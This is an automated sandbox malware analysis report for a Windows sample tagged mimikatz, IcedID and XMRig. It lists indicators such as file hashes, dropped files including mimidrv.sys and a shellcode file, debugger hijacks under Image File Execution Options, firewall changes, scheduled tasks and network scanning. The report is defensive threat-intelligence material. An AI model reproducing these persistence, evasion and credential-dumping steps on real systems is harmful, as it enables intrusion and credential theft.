mimikatz | 280158f70c994f7c28d61e96004ed5801f5eeb3c07daff4a561d81e122ff6663

Analysis

max time kernel
139s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
02/08/2023, 16:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

380f820dbc3b460dd7198b15b23b9a4c_hacktools_icedid_mimikatz_JC.exe
Size

9.3MB
MD5

380f820dbc3b460dd7198b15b23b9a4c
SHA1

87dbd74dc05a2dd618fc05135d64fe7db981be56
SHA256

280158f70c994f7c28d61e96004ed5801f5eeb3c07daff4a561d81e122ff6663
SHA512

cbcddf26cd74ed8dfe3d08d8a5583bc010383988eb573bc7e782f3b4bfbe0dc5b73fa36fe0c443677d039ac054786a2eeb658c84183258d707b7e098ea4eb54c
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig discovery evasion miner persistence upx

Malware Config

Signatures

Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3428 created 1692	3428	tpefvts.exe	53

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (26286) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/4468-307-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	xmrig
behavioral2/memory/4468-312-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	xmrig
behavioral2/memory/4468-326-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	xmrig
behavioral2/memory/4468-338-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	xmrig
behavioral2/memory/4468-347-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	xmrig
behavioral2/memory/4468-356-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	xmrig
behavioral2/memory/4468-377-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	xmrig
behavioral2/memory/4468-384-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	xmrig
behavioral2/memory/4468-385-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	xmrig
behavioral2/memory/4468-386-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	xmrig
behavioral2/memory/4468-390-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	xmrig
behavioral2/memory/4468-393-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 9 IoCs

resource	yara_rule
behavioral2/memory/4532-133-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x00060000000231cb-138.dat	mimikatz
behavioral2/files/0x00060000000231cb-139.dat	mimikatz
behavioral2/memory/2796-140-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x00060000000231cb-141.dat	mimikatz
behavioral2/files/0x000600000002321a-259.dat	mimikatz
behavioral2/memory/2428-269-0x00007FF647A00000-0x00007FF647AEE000-memory.dmp	mimikatz
behavioral2/files/0x000600000002321a-350.dat	mimikatz
behavioral2/files/0x000600000002321a-349.dat	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	tpefvts.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	tpefvts.exe

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
3848	netsh.exe
1232	netsh.exe

Sets file execution options in registry 2 TTPs 40 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	tpefvts.exe

Executes dropped EXE 28 IoCs

pid	Process
2796	tpefvts.exe
3428	tpefvts.exe
1060	wpcap.exe
4672	ahunzksbu.exe
2428	vfshost.exe
3724	bshigespg.exe
4468	ffieug.exe
3264	bshigespg.exe
3956	xohudmc.exe
3316	cuwouc.exe
764	bshigespg.exe
2276	bshigespg.exe
4968	bshigespg.exe
4884	bshigespg.exe
1752	bshigespg.exe
2656	bshigespg.exe
2828	bshigespg.exe
4064	bshigespg.exe
1124	bshigespg.exe
4220	tpefvts.exe
3620	bshigespg.exe
2868	bshigespg.exe
2720	bshigespg.exe
640	jkabubcfq.exe
2200	bshigespg.exe
3600	bshigespg.exe
1412	bshigespg.exe
1164	bshigespg.exe

Loads dropped DLL 12 IoCs

pid	Process
1060	wpcap.exe
1060	wpcap.exe
1060	wpcap.exe
1060	wpcap.exe
1060	wpcap.exe
1060	wpcap.exe
1060	wpcap.exe
1060	wpcap.exe
1060	wpcap.exe
4672	ahunzksbu.exe
4672	ahunzksbu.exe
4672	ahunzksbu.exe

UPX packed file 53 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000023214-266.dat	upx
behavioral2/memory/2428-267-0x00007FF647A00000-0x00007FF647AEE000-memory.dmp	upx
behavioral2/files/0x0006000000023214-268.dat	upx
behavioral2/memory/2428-269-0x00007FF647A00000-0x00007FF647AEE000-memory.dmp	upx
behavioral2/memory/3724-273-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/files/0x000600000002321f-272.dat	upx
behavioral2/files/0x000600000002321f-274.dat	upx
behavioral2/memory/3724-276-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/files/0x000600000002321c-279.dat	upx
behavioral2/memory/4468-280-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	upx
behavioral2/files/0x000600000002321c-281.dat	upx
behavioral2/files/0x000600000002321f-286.dat	upx
behavioral2/memory/3264-304-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/files/0x000600000002321f-306.dat	upx
behavioral2/memory/4468-307-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	upx
behavioral2/memory/764-310-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/memory/4468-312-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	upx
behavioral2/files/0x000600000002321f-313.dat	upx
behavioral2/memory/2276-315-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/files/0x000600000002321f-317.dat	upx
behavioral2/memory/4968-319-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/files/0x000600000002321f-321.dat	upx
behavioral2/memory/4884-323-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/files/0x000600000002321f-325.dat	upx
behavioral2/memory/4468-326-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	upx
behavioral2/memory/1752-328-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/files/0x000600000002321f-330.dat	upx
behavioral2/memory/2656-332-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/files/0x000600000002321f-334.dat	upx
behavioral2/memory/2828-336-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/memory/4468-338-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	upx
behavioral2/files/0x000600000002321f-339.dat	upx
behavioral2/memory/4064-341-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/files/0x000600000002321f-343.dat	upx
behavioral2/memory/1124-345-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/memory/4468-347-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	upx
behavioral2/files/0x000600000002321f-352.dat	upx
behavioral2/memory/3620-354-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/memory/4468-356-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	upx
behavioral2/files/0x000600000002321f-357.dat	upx
behavioral2/memory/2868-359-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/files/0x000600000002321f-361.dat	upx
behavioral2/memory/2720-363-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/memory/2200-376-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/memory/4468-377-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	upx
behavioral2/memory/3600-379-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/memory/1412-381-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/memory/1164-383-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp	upx
behavioral2/memory/4468-384-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	upx
behavioral2/memory/4468-385-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	upx
behavioral2/memory/4468-386-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	upx
behavioral2/memory/4468-390-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	upx
behavioral2/memory/4468-393-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp	upx

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
96	ifconfig.me
97	ifconfig.me

Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\cuwouc.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	tpefvts.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	tpefvts.exe
File created	C:\Windows\SysWOW64\cuwouc.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	tpefvts.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	tpefvts.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	tpefvts.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	tpefvts.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	tpefvts.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9210422E11ED6E0D0E9DED5E777AF6ED	tpefvts.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9210422E11ED6E0D0E9DED5E777AF6ED	tpefvts.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	tpefvts.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	tpefvts.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\cubjtihin\UnattendGC\svschost.xml	tpefvts.exe
File opened for modification	C:\Windows\iiyquivu\spoolsrv.xml	tpefvts.exe
File opened for modification	C:\Windows\cubjtihin\Corporate\log.txt	cmd.exe
File created	C:\Windows\cubjtihin\cgeufuill\Packet.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\coli-0.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\spoolsrv.xml	tpefvts.exe
File created	C:\Windows\iiyquivu\vimpcsvc.xml	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\AppCapture64.dll	tpefvts.exe
File created	C:\Windows\iiyquivu\tpefvts.exe	380f820dbc3b460dd7198b15b23b9a4c_hacktools_icedid_mimikatz_JC.exe
File created	C:\Windows\cubjtihin\cgeufuill\wpcap.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\ucl.dll	tpefvts.exe
File opened for modification	C:\Windows\iiyquivu\svschost.xml	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\Shellcode.ini	tpefvts.exe
File created	C:\Windows\cubjtihin\Corporate\mimidrv.sys	tpefvts.exe
File created	C:\Windows\cubjtihin\cgeufuill\wpcap.exe	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\xdvl-0.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\spoolsrv.exe	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\docmicfg.exe	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\docmicfg.xml	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\spoolsrv.xml	tpefvts.exe
File created	C:\Windows\iiyquivu\svschost.xml	tpefvts.exe
File opened for modification	C:\Windows\cubjtihin\cgeufuill\Result.txt	jkabubcfq.exe
File created	C:\Windows\iiyquivu\schoedcl.xml	tpefvts.exe
File opened for modification	C:\Windows\iiyquivu\schoedcl.xml	tpefvts.exe
File created	C:\Windows\cubjtihin\Corporate\mimilib.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\exma-1.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\ssleay32.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\trfo-2.dll	tpefvts.exe
File opened for modification	C:\Windows\iiyquivu\vimpcsvc.xml	tpefvts.exe
File opened for modification	C:\Windows\cubjtihin\cgeufuill\Packet.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\crli-0.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\tibe-2.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\vimpcsvc.xml	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\schoedcl.xml	tpefvts.exe
File created	C:\Windows\iiyquivu\docmicfg.xml	tpefvts.exe
File created	C:\Windows\cubjtihin\upbdrjv\swrpwe.exe	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\posh-0.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\svschost.xml	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\schoedcl.exe	tpefvts.exe
File created	C:\Windows\ime\tpefvts.exe	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\libeay32.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\AppCapture32.dll	tpefvts.exe
File opened for modification	C:\Windows\iiyquivu\tpefvts.exe	380f820dbc3b460dd7198b15b23b9a4c_hacktools_icedid_mimikatz_JC.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\trch-1.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\vimpcsvc.exe	tpefvts.exe
File created	C:\Windows\iiyquivu\spoolsrv.xml	tpefvts.exe
File created	C:\Windows\cubjtihin\cgeufuill\ahunzksbu.exe	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\zlib1.dll	tpefvts.exe
File opened for modification	C:\Windows\iiyquivu\docmicfg.xml	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\tucl-1.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\cgeufuill\jkabubcfq.exe	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\svschost.exe	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\schoedcl.xml	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\vimpcsvc.xml	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\docmicfg.xml	tpefvts.exe
File created	C:\Windows\cubjtihin\Corporate\vfshost.exe	tpefvts.exe
File created	C:\Windows\cubjtihin\cgeufuill\ip.txt	tpefvts.exe
File created	C:\Windows\cubjtihin\cgeufuill\scan.bat	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\cnli-1.dll	tpefvts.exe
File created	C:\Windows\cubjtihin\UnattendGC\specials\libxml2.dll	tpefvts.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4588	sc.exe
1988	sc.exe
2764	sc.exe
2172	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 10 IoCs

installer

resource	yara_rule
behavioral2/files/0x00060000000231cb-138.dat	nsis_installer_2
behavioral2/files/0x00060000000231cb-139.dat	nsis_installer_2
behavioral2/files/0x00060000000231cb-141.dat	nsis_installer_2
behavioral2/files/0x00090000000231c3-147.dat	nsis_installer_1
behavioral2/files/0x00090000000231c3-147.dat	nsis_installer_2
behavioral2/files/0x00090000000231c3-148.dat	nsis_installer_1
behavioral2/files/0x00090000000231c3-148.dat	nsis_installer_2
behavioral2/files/0x000600000002321a-259.dat	nsis_installer_2
behavioral2/files/0x000600000002321a-350.dat	nsis_installer_2
behavioral2/files/0x000600000002321a-349.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
764	schtasks.exe
1404	schtasks.exe
4468	schtasks.exe

Modifies data under HKEY_USERS 45 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	tpefvts.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	tpefvts.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	tpefvts.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	tpefvts.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	tpefvts.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	tpefvts.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
